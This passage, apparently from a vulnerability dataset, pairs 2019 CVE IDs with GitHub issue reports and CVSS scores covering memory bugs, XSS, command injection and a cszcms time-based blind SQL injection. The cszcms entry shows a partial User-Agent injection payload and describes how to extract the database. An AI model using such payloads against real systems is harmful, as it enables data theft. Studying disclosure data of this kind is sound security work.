  35643. "severity": "HIGH",
  35644. "baseScore": 7.8,
  35645. "impactScore": 5.9,
  35646. "exploitabilityScore": 1.8
  35647. },
  35648. {
  35649. "CVE_ID": "CVE-2019-12791",
  35650. "Issue_Url_old": "https://github.com/serghey-rodin/vesta/issues/1921",
  35651. "Issue_Url_new": "https://github.com/serghey-rodin/vesta/issues/1921",
  35652. "Repo_new": "serghey-rodin/vesta",
  35653. "Issue_Created_At": "2019-07-29T17:28:57Z",
  35654. "description": "SECURITY: two privilege escalation from regular user to root. APITAG for the dramatic subject.) Well, it's really disappointing and unprofessional to come to this... Two months ago NUMBERTAG I disclosed two privilege escalation vulnerabilities to EMAILTAG (and eventually also to EMAILTAG and EMAILTAG ), I obtained no useful replies or actions so I'm trying to reach a wider audience by opening an issue here (and no, I won't join the forum). As today the two vulnerabilities are still undisclosed as I fairly believe that a responsible disclosure approach is the right way to go. Yet we're pushing the boundaries here and I don't think the maintainers are being respectful of the userbase. So this is my last attempt to get these issues fixed, after that I will disclose them anyway, fixed or not. Users having write access to this repo can reach me privately for details, it's even better if they reply to the original message sent to the above EMAILTAG addresses, provided that they're allowed to do that.",
  35655. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35656. "severity": "HIGH",
  35657. "baseScore": 8.8,
  35658. "impactScore": 5.9,
  35659. "exploitabilityScore": 2.8
  35660. },
  35661. {
  35662. "CVE_ID": "CVE-2019-12802",
  35663. "Issue_Url_old": "https://github.com/radare/radare2/issues/14296",
  35664. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/14296",
  35665. "Repo_new": "radareorg/radare2",
  35666. "Issue_Created_At": "2019-06-13T18:56:39Z",
  35667. "description": "Ragg2 Lacks Boundary Check when Changing Context . Ragg2 lacks boundary check when changing context in here URLTAG . When APITAG or APITAG , CTX would be out of boundary. As a result, it could cause both invalid memory access and invalid free. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a NUMBERTAG ca commit: APITAG build NUMBERTAG Expected behavior NO CRASH Actual behavior Invalid Memory Access APITAG Invalid Free ERRORTAG Steps to reproduce the behavior Follow actions mentioned above. Additional Logs, screenshots, source code, configuration dump, ... Invalid Memory Access FILETAG Output of valgrind: ERRORTAG Invalid Free FILETAG Output of valgrind ERRORTAG",
  35668. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35669. "severity": "HIGH",
  35670. "baseScore": 7.8,
  35671. "impactScore": 5.9,
  35672. "exploitabilityScore": 1.8
  35673. },
  35674. {
  35675. "CVE_ID": "CVE-2019-12814",
  35676. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2341",
  35677. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2341",
  35678. "Repo_new": "fasterxml/jackson-databind",
  35679. "Issue_Created_At": "2019-06-04T04:08:07Z",
  35680. "description": "Block yet another gadget type (CVE to be requested). Similar to other polymorphic types with no limits, but for XXE with APITAG . Need to request CVE ID.",
  35681. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  35682. "severity": "MEDIUM",
  35683. "baseScore": 5.9,
  35684. "impactScore": 3.6,
  35685. "exploitabilityScore": 2.2
  35686. },
  35687. {
  35688. "CVE_ID": "CVE-2019-12822",
  35689. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/285",
  35690. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/285",
  35691. "Repo_new": "embedthis/goahead",
  35692. "Issue_Created_At": "2019-06-14T02:14:42Z",
  35693. "description": "Header parsing causing invalid memory reference. Overview A security vulnerability affecting APITAG versions NUMBERTAG has been identified. This bulletin discusses this flaw and its implications. Summary An invalid set of HTTP headers may trigger an out of bounds memory access. Description The following request will trigger a memory assertion and subsequent out of bounds memory access. Depending on the system, compiler, operating environment and configuration, this could lead corrupted execution and a denial of service. APITAG Threat Scope Versions up to and including NUMBERTAG Remedy Upgrade to NUMBERTAG when released or apply the following patch: ERRORTAG Please contact Embedthis if you require further information, test code or assistance at EMAILTAG . References APITAG Issue URLTAG CVE CVE pending. Thanks Thanks to Yakun Zhang and Zheng Huang of Baidu Security Lab for finding and diagnosing this issue.",
  35694. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35695. "severity": "HIGH",
  35696. "baseScore": 7.5,
  35697. "impactScore": 3.6,
  35698. "exploitabilityScore": 3.9
  35699. },
  35700. {
  35701. "CVE_ID": "CVE-2019-12829",
  35702. "Issue_Url_old": "https://github.com/radare/radare2/issues/14303",
  35703. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/14303",
  35704. "Repo_new": "radareorg/radare2",
  35705. "Issue_Created_At": "2019-06-15T04:49:02Z",
  35706. "description": "Function r_parse_parse Lacks Boundary Check. For APITAG (and other APITAG function parse URLTAG lacks a boundary check for newstr , leading heap /stack based buffer over write. Such buffer overflow could be trigger from rasm2 URLTAG . As r_parse_parse URLTAG , which actually calls function parse URLTAG for APITAG could extend APITAG and write back to APITAG , it would cause a heap based buffer over write. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG ga1ade7d NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior NO CRASH Actual behavior CODETAG Steps to reproduce the behavior Follow actions mentioned above. Additional Logs, screenshots, source code, configuration dump, ... Output of valgrind: FILETAG",
  35707. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35708. "severity": "HIGH",
  35709. "baseScore": 7.5,
  35710. "impactScore": 3.6,
  35711. "exploitabilityScore": 3.9
  35712. },
  35713. {
  35714. "CVE_ID": "CVE-2019-12835",
  35715. "Issue_Url_old": "https://github.com/JayXon/Leanify/issues/52",
  35716. "Issue_Url_new": "https://github.com/jayxon/leanify/issues/52",
  35717. "Repo_new": "jayxon/leanify",
  35718. "Issue_Created_At": "2019-05-24T18:22:27Z",
  35719. "description": "Fuzzing Tests: OOB Write in XML Parser. Controlled Length Out of Bounds Write Using the corpus of test files from the previous crash I also included an XML file. The crash is relative to the XML library implementation of Leanify resulting in another issue with an OOB write independent of the fixed OOB APITAG in ICO. I discovered this via fuzzing and did some light root cause analysis and another party heavily expanded on the exploitability of this issue. Details below: A moderately controllable memory corruption vulnerability affects the implementation of xml_memory_writer in APITAG as shown below: ++ struct xml_memory_writer : pugi::xml_writer { uint8_t p_write; void write(const void data, size_t size) override { memcpy(p_write, data, size); Line NUMBERTAG p_write += size; } }; } // namespace pugi::xml_writer implementations should additionally track the capacity of the target buffer as shown in the pugixml documentation here: FILETAG It is possible to control the amount of data written past the end of the buffer by appending characters that require escaping as shown in the text_output_escaped function in APITAG as shown below: ++ PUGI__FN void APITAG writer, const char_t s, chartypex_t type, unsigned int flags) { / TRUNCATED / switch ( s) { case NUMBERTAG break; case '&': APITAG 'a', 'm', 'p', ';'); ++s; break; case ' APITAG ': APITAG 'g', 't', ';'); ++s; break; case '\"': APITAG 'q', 'u', 'o', 't', ';'); ++s; break; default: // s is not a usual symbol { unsigned int ch = static_cast<unsigned int>( s++); assert(ch APITAG ((ch NUMBERTAG static_cast APITAG ((ch NUMBERTAG TRUNCATED / The following base NUMBERTAG test case will crash the target binary by expanding a number of & to the escaped &amp; (a gain of NUMBERTAG bytes in extension). 
APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG For full stack trace on the crash, see the ASAN output below: APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG b7fce NUMBERTAG at pc NUMBERTAG b7af7a NUMBERTAG bp NUMBERTAG bfffc8f8 sp NUMBERTAG bfffc4cc WRITE of size NUMBERTAG at NUMBERTAG b7fce NUMBERTAG thread T NUMBERTAG b7af7a NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG b7af7c2f in memcpy ( PATHTAG NUMBERTAG a NUMBERTAG c in (anonymous APITAG const , unsigned int) [clone . APITAG APITAG NUMBERTAG d NUMBERTAG e in flush PATHTAG NUMBERTAG d NUMBERTAG in pugi::impl::(anonymous APITAG [clone . APITAG PATHTAG NUMBERTAG bfed4 in APITAG char const , unsigned int, pugi::xml_encoding) const PATHTAG NUMBERTAG b5fe in APITAG int) APITAG NUMBERTAG af NUMBERTAG in APITAG , unsigned int, unsigned int, APITAG std::char_traits APITAG , std::allocator APITAG > const &) PATHTAG NUMBERTAG b NUMBERTAG c2 in APITAG PATHTAG NUMBERTAG b1cde in main PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG ) The testfile was generated using the AFL fuzzer by lcamtuf.",
  35720. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35721. "severity": "CRITICAL",
  35722. "baseScore": 9.8,
  35723. "impactScore": 5.9,
  35724. "exploitabilityScore": 3.9
  35725. },
  35726. {
  35727. "CVE_ID": "CVE-2019-12865",
  35728. "Issue_Url_old": "https://github.com/radare/radare2/issues/14334",
  35729. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/14334",
  35730. "Repo_new": "radareorg/radare2",
  35731. "Issue_Created_At": "2019-06-17T05:08:54Z",
  35732. "description": "Double Free in cmd_mount Causes Crash. Function cmd_mount URLTAG would Double Free cwd URLTAG via malicious commands. Basically, first command ms to get in fs_shell URLTAG would cause cwd = strdup(path) URLTAG . After returning from fs_shell, r2 will free cwd URLTAG . Note that cwd is not reset as NULL. Later, command ERRORTAG would let r2 goes into r_fs_shell_prompt URLTAG , but returns here URLTAG without resetting cwd . Then, cwd is double freed. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | malloc NUMBERTAG Architecture/bits of the file (mandatory) | None | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG b8e2d5 commit: APITAG build NUMBERTAG Expected behavior NO CRASH Actual behavior ERRORTAG Steps to reproduce the behavior Follow actions mentioned above Additional Logs, screenshots, source code, configuration dump, ... This double free could be fixed by replacing free as APITAG here URLTAG Output of valgrind ERRORTAG",
  35733. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35734. "severity": "MEDIUM",
  35735. "baseScore": 5.5,
  35736. "impactScore": 3.6,
  35737. "exploitabilityScore": 1.8
  35738. },
  35739. {
  35740. "CVE_ID": "CVE-2019-12872",
  35741. "Issue_Url_old": "https://github.com/dotCMS/core/issues/16624",
  35742. "Issue_Url_new": "https://github.com/dotcms/core/issues/16624",
  35743. "Repo_new": "dotcms/core",
  35744. "Issue_Created_At": "2019-05-28T15:06:21Z",
  35745. "description": "APITAG for Security Issue. This is a placeholder for a reported security issue; details can be found here: URLTAG",
  35746. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  35747. "severity": "HIGH",
  35748. "baseScore": 7.2,
  35749. "impactScore": 5.9,
  35750. "exploitabilityScore": 1.2
  35751. },
  35752. {
  35753. "CVE_ID": "CVE-2019-12950",
  35754. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2638",
  35755. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2638",
  35756. "Repo_new": "nilsteampassnet/teampass",
  35757. "Issue_Created_At": "2019-06-25T14:22:03Z",
  35758. "description": "Stored XSS. Steps to reproduce NUMBERTAG Create a CSV file with the following data: ERRORTAG NUMBERTAG From Teampass, go select APITAG items\" feature NUMBERTAG On the CSV tab, select the file previously created NUMBERTAG Select the item with XSS payload to import That's all... we can tap to item and XSS payload will be executed. FILETAG",
  35759. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  35760. "severity": "MEDIUM",
  35761. "baseScore": 5.4,
  35762. "impactScore": 2.7,
  35763. "exploitabilityScore": 2.3
  35764. },
  35765. {
  35766. "CVE_ID": "CVE-2019-12966",
  35767. "Issue_Url_old": "https://github.com/zxlie/FeHelper/issues/63",
  35768. "Issue_Url_new": "https://github.com/zxlie/fehelper/issues/63",
  35769. "Repo_new": "zxlie/fehelper",
  35770. "Issue_Created_At": "2019-06-26T03:36:43Z",
  35771. "description": "Arbitrary code execution when formatting JSON. PoC: ERRORTAG FILETAG FILETAG When a page consists of a single JS document, it may result in code execution (it should not be executed when browsing a single JS file without any HTML tag). I discovered the insecure code in APITAG , line NUMBERTAG to line NUMBERTAG . Additionally, I understand the code is made tolerant of malformed JSON content like APITAG , but as a result it is insecure.",
  35772. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35773. "severity": "CRITICAL",
  35774. "baseScore": 9.8,
  35775. "impactScore": 5.9,
  35776. "exploitabilityScore": 3.9
  35777. },
  35778. {
  35779. "CVE_ID": "CVE-2019-12974",
  35780. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1515",
  35781. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1515",
  35782. "Repo_new": "imagemagick/imagemagick",
  35783. "Issue_Created_At": "2019-03-21T03:25:02Z",
  35784. "description": "Null pointer dereference in function APITAG in coders/pango.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a null pointer dereference vulnerability in function APITAG in coders/pango.c ERRORTAG ( URLTAG The return value of APITAG may be NULL, and it is then dereferenced without a NULL check. See CVETAG and URLTAG for details.",
  35785. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35786. "severity": "MEDIUM",
  35787. "baseScore": 5.5,
  35788. "impactScore": 3.6,
  35789. "exploitabilityScore": 1.8
  35790. },
  35791. {
  35792. "CVE_ID": "CVE-2019-12975",
  35793. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1517",
  35794. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1517",
  35795. "Repo_new": "imagemagick/imagemagick",
  35796. "Issue_Created_At": "2019-03-21T06:25:46Z",
  35797. "description": "Possible but rare memory leak in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a possible but rare memory leak in function APITAG in coders/dpx.c. ERRORTAG We should call ERRORTAG when condition APITAG satisfies behind for loop. See commit URLTAG for more details.",
  35798. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35799. "severity": "MEDIUM",
  35800. "baseScore": 5.5,
  35801. "impactScore": 3.6,
  35802. "exploitabilityScore": 1.8
  35803. },
  35804. {
  35805. "CVE_ID": "CVE-2019-12976",
  35806. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1520",
  35807. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1520",
  35808. "Repo_new": "imagemagick/imagemagick",
  35809. "Issue_Created_At": "2019-03-21T07:25:10Z",
  35810. "description": "Memory leak in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a memory leak in function APITAG in coders/pcl.c. ERRORTAG We should call APITAG before return statement. CODETAG",
  35811. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35812. "severity": "MEDIUM",
  35813. "baseScore": 5.5,
  35814. "impactScore": 3.6,
  35815. "exploitabilityScore": 1.8
  35816. },
  35817. {
  35818. "CVE_ID": "CVE-2019-12977",
  35819. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1518",
  35820. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1518",
  35821. "Repo_new": "imagemagick/imagemagick",
  35822. "Issue_Created_At": "2019-03-21T06:44:34Z",
  35823. "description": "Use of uninitialized value in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a use-of-uninitialized-value vulnerability in function APITAG in coders/jp2.c. CODETAG URLTAG We should call APITAG right after the declaration so the value is initialized before use. See CVETAG URLTAG and APITAG for details.",
  35824. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35825. "severity": "HIGH",
  35826. "baseScore": 7.8,
  35827. "impactScore": 5.9,
  35828. "exploitabilityScore": 1.8
  35829. },
  35830. {
  35831. "CVE_ID": "CVE-2019-12978",
  35832. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1519",
  35833. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1519",
  35834. "Repo_new": "imagemagick/imagemagick",
  35835. "Issue_Created_At": "2019-03-21T06:54:58Z",
  35836. "description": "Use of uninitialized value in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a use-of-uninitialized-value vulnerability in function APITAG in coders/pango.c. ERRORTAG URLTAG We should call ERRORTAG when condition APITAG is satisfied. Otherwise, there is a use-of-uninitialized-value vulnerability. See CVETAG CVETAG URLTAG and URLTAG for more details.",
  35837. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35838. "severity": "HIGH",
  35839. "baseScore": 7.8,
  35840. "impactScore": 5.9,
  35841. "exploitabilityScore": 1.8
  35842. },
  35843. {
  35844. "CVE_ID": "CVE-2019-12979",
  35845. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1522",
  35846. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1522",
  35847. "Repo_new": "imagemagick/imagemagick",
  35848. "Issue_Created_At": "2019-03-21T11:58:29Z",
  35849. "description": "Use of uninitialized value in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is an issue in function APITAG in APITAG The issue is similar to CVETAG which was fixed in URLTAG CODETAG Below is the proposal patch. CODETAG",
  35850. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35851. "severity": "HIGH",
  35852. "baseScore": 7.8,
  35853. "impactScore": 5.9,
  35854. "exploitabilityScore": 1.8
  35855. },
  35856. {
  35857. "CVE_ID": "CVE-2019-12995",
  35858. "Issue_Url_old": "https://github.com/istio/istio/issues/15084",
  35859. "Issue_Url_new": "https://github.com/istio/istio/issues/15084",
  35860. "Repo_new": "istio/istio",
  35861. "Issue_Created_At": "2019-06-24T05:36:31Z",
  35862. "description": "JWT authentication causing APITAG NUMBERTAG terminated with an error\" in Envoy. Bug description I'm trying to implement service to service JWT authentication like something shown in this URLTAG repo. While it's working fine with Auth0, I'm having trouble while setting it up with my company's authentication service. I made the service architecture by following this URLTAG article, you can see my repository here URLTAG . This is the policy I'm applying > CODETAG I'm hosting the public key locally, you can find it FILETAG too. If I hit the service with an invalid access key (say it's expired), I'm getting a NUMBERTAG as expected, but a valid access key gives a ERRORTAG Upon checking the logs for the envoy proxy of the publisher pod, I can see this > ERRORTAG This log message isn't there when working successfully with Auth0, so I think this might be a hint. But looking at the lines in the source code where this log message is present, I can't figure out much.... One reason I think this might occur is the different keys in access token I'm passing. The Auth0 access token has the following keys > CODETAG And my access token looks like this > CODETAG Anybody has any ideas, I've been stuck for quite some time now, any help will be appreciated..! Affected product area (please put an X in all that apply) ] Configuration Infrastructure [ ] Docs [ ] Installation [ ] Networking [ ] Performance and Scalability [x] Policies and Telemetry [x] Security [ ] Test and Release [ ] User Experience [ ] Developer Infrastructure Expected behavior NUMBERTAG on valid Access Token Steps to reproduce the bug Sadly not possible, as the access token I'm using is private to my company :( Version (include the output of APITAG and kubectl version ) ERRORTAG CODETAG How was Istio installed? Helm template, I followed [this URLTAG article. Environment where bug was observed (cloud vendor, OS, etc) Windows NUMBERTAG running the cluster on Minikube. \nAdditionally, please consider attaching a FILETAG ) by attaching the dump file to this issue.",
  35863. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35864. "severity": "HIGH",
  35865. "baseScore": 7.5,
  35866. "impactScore": 3.6,
  35867. "exploitabilityScore": 3.9
  35868. },
  35869. {
  35870. "CVE_ID": "CVE-2019-12997",
  35871. "Issue_Url_old": "https://github.com/icon-project/loopchain/issues/231",
  35872. "Issue_Url_new": "https://github.com/icon-project/loopchain/issues/231",
  35873. "Repo_new": "icon-project/loopchain",
  35874. "Issue_Created_At": "2019-06-20T07:49:55Z",
  35875. "description": "Command Injection. Description: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation. Details: APITAG An attacker can manipulate DEFAULT_SCORE_HOST, which is user-supplied input that is trusted without validation; this can be used to inject commands and gain arbitrary code execution. Affected URL: FILETAG Affected Code: APITAG Reference: URLTAG APITAG ERRORTAG",
  35876. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35877. "severity": "HIGH",
  35878. "baseScore": 8.8,
  35879. "impactScore": 5.9,
  35880. "exploitabilityScore": 2.8
  35881. },
  35882. {
  35883. "CVE_ID": "CVE-2019-13032",
  35884. "Issue_Url_old": "https://github.com/Sigil-Ebook/flightcrew/issues/53",
  35885. "Issue_Url_new": "https://github.com/sigil-ebook/flightcrew/issues/53",
  35886. "Repo_new": "sigil-ebook/flightcrew",
  35887. "Issue_Created_At": "2019-06-26T15:32:15Z",
  35888. "description": "Null Pointer Dereference. Summary An issue was discovered in APITAG NUMBERTAG and earlier. A NULL pointer dereference occurs in APITAG when a null pointer is passed to APITAG Details If the package.opf contains APITAG elements without \"href\" attributes, then the variable \"href\" is set to an empty string on APITAG URLTAG . On APITAG URLTAG , APITAG is called which returns a NULL pointer if href is empty. This pointer is then passed to APITAG which dereferences it, causing a segmentation fault. In the attached FILETAG , you'll see that the href attributes in EPUB/package.opf have been replaced by the attribute \"malformed\". Impact This vulnerability has very little security impact for Sigil users, but may be used as a Denial of Service attack against third party software that uses APITAG as a library. Steps to reproduce NUMBERTAG Download the attached APITAG NUMBERTAG On a linux system, process APITAG using flightcrew cli. APITAG At this point, flightcrew cli will segfault. FILETAG",
  35889. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35890. "severity": "MEDIUM",
  35891. "baseScore": 5.5,
  35892. "impactScore": 3.6,
  35893. "exploitabilityScore": 1.8
  35894. },
  35895. {
  35896. "CVE_ID": "CVE-2019-13067",
  35897. "Issue_Url_old": "https://github.com/nginx/njs/issues/183",
  35898. "Issue_Url_new": "https://github.com/nginx/njs/issues/183",
  35899. "Repo_new": "nginx/njs",
  35900. "Issue_Created_At": "2019-06-20T12:23:30Z",
  35901. "description": "heap buffer overflow in nxt_utf8_decode APITAG NJS version: CODETAG JS Testcase: ERRORTAG ASAN log: ERRORTAG Found by fluff URLTAG",
  35902. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35903. "severity": "CRITICAL",
  35904. "baseScore": 9.8,
  35905. "impactScore": 5.9,
  35906. "exploitabilityScore": 3.9
  35907. },
  35908. {
  35909. "CVE_ID": "CVE-2019-13068",
  35910. "Issue_Url_old": "https://github.com/grafana/grafana/issues/17718",
  35911. "Issue_Url_new": "https://github.com/grafana/grafana/issues/17718",
  35912. "Repo_new": "grafana/grafana",
  35913. "Issue_Created_At": "2019-06-24T08:15:00Z",
  35914. "description": "HTML injection in panel links (drilldown). You can inject image tags in panel drilldown links (via the Title & URL fields). There is no script injection, as that is already sanitized, but there is no need to allow HTML in these fields at all. The problem is here: URLTAG Using an escape function when building the HTML there should solve it. Here is where you can replicate it: APITAG",
  35915. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
  35916. "severity": "MEDIUM",
  35917. "baseScore": 5.4,
  35918. "impactScore": 2.5,
  35919. "exploitabilityScore": 2.8
  35920. },
  35921. {
  35922. "CVE_ID": "CVE-2019-13072",
  35923. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2642",
  35924. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2642",
  35925. "Repo_new": "zoneminder/zoneminder",
  35926. "Issue_Created_At": "2019-06-18T00:07:40Z",
  35927. "description": "Stored Cross Site Scripting Filters. APITAG version NUMBERTAG Installed from PPA APITAG Xenial) Ubuntu NUMBERTAG enial The APITAG page in APITAG NUMBERTAG is vulnerable to stored cross site scripting due to improper input sanitization in the APITAG field. This is the latest version available in the Ubuntu NUMBERTAG PPA. Please see attached screenshots. APITAG APITAG Steps to reproduce the behavior NUMBERTAG Go to the APITAG page NUMBERTAG In the APITAG field paste in a javascript payload such as APITAG APITAG NUMBERTAG Refresh the page to verify that the payload executes and remains stored across browser sessions. Expected behavior: user input should be validated, and stored values should be escaped when rendered so that special characters are displayed as text rather than interpreted as HTML or script.",
  35928. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  35929. "severity": "MEDIUM",
  35930. "baseScore": 5.4,
  35931. "impactScore": 2.7,
  35932. "exploitabilityScore": 2.3
  35933. },
  35934. {
  35935. "CVE_ID": "CVE-2019-13086",
  35936. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/19",
  35937. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/19",
  35938. "Repo_new": "cskaza/cszcms",
  35939. "Issue_Created_At": "2019-06-19T14:18:29Z",
  35940. "description": "Bug Report: Time based blind SQL injection Vulnerability in PATHTAG on cszcms NUMBERTAG Title : Time based blind SQL injection Vulnerability in PATHTAG on cszcms NUMBERTAG Date NUMBERTAG June NUMBERTAG Discovered by : MENTIONTAG from ABT Labs Security : high (dump database) Software : FILETAG Description : There is a high risk time based SQL injection vulnerability on the frontend login page( URLTAG Exploiting this vulnerability could dump the whole database without logging in. When logging in on the frontend login page, if the csrf_csz parameter is removed or padded with any string, a log is recorded in the table 'login_logs' with reason 'CSRF Protection Invalid'. But the 'HTTP_USER_AGENT' field is used directly, without any check or parameter binding, when inserting that record. By constructing a special 'HTTP_USER_AGENT' field, this vulnerability can be exploited. files: PATHTAG FILETAG login page: FILETAG login_logs: FILETAG If you remove the csrf_csz parameter and log in again, a 'CSRF Protection Invalid' log is recorded. login_logs: FILETAG Exploit : construct an HTTP_USER_AGENT and remove the csrf_csz parameter: FILETAG User Agent: ' ( if( condition, sleep NUMBERTAG APITAG If the condition is true, the page returns after NUMBERTAG seconds; otherwise it returns immediately. When the UA is ' (if((substr((select email from user_admin limit NUMBERTAG sleep NUMBERTAG APITAG The SQL string is INSERT INTO login_logs (email_login, note, result, user_agent, ip_address, timestamp_create) VALUES ('', 'CSRF Protection Invalid', 'CSRF_INVALID', '' (if((substr((select email from user_admin limit NUMBERTAG sleep NUMBERTAG APITAG ', APITAG NUMBERTAG APITAG The insert statement does not actually execute because the last column is not in the correct time format. But the sub-select statement is still evaluated, and the sleep executes if the condition is true. FILETAG So, the records in the login_logs table do not increase. \nThe IP is not added to the blacklist and the condition ($count NUMBERTAG in line NUMBERTAG ) is always true, so the lockout never triggers. Then you can dump the whole database one byte at a time. Suggestion: use a parameterized (prepared) query for the login_logs INSERT instead of interpolating the User-Agent string into the SQL; checking the UA value before insertion is not a sufficient fix on its own.",
  35941. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35942. "severity": "CRITICAL",
  35943. "baseScore": 9.8,
  35944. "impactScore": 5.9,
  35945. "exploitabilityScore": 3.9
  35946. },
  35947. {
  35948. "CVE_ID": "CVE-2019-13108",
  35949. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/789",
  35950. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/789",
  35951. "Repo_new": "exiv2/exiv2",
  35952. "Issue_Created_At": "2019-04-24T15:24:45Z",
  35953. "description": "SIGSEGV in APITAG There is a bug at APITAG URLTAG . If APITAG , which happens if ERRORTAG , then Exi NUMBERTAG crashes with a SIGSEGV.",
  35954. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35955. "severity": "MEDIUM",
  35956. "baseScore": 6.5,
  35957. "impactScore": 3.6,
  35958. "exploitabilityScore": 2.8
  35959. },
  35960. {
  35961. "CVE_ID": "CVE-2019-13109",
